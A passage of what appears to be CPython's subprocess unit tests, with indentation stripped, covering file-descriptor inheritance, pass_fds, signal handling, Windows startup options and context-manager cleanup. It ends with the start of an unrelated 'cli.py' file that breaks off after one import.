sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = [sys.executable, '-c', 'pass']
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = [sys.executable, "-c", "pass"]
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
cli.py
|
"""
Command line entry
"""
import os
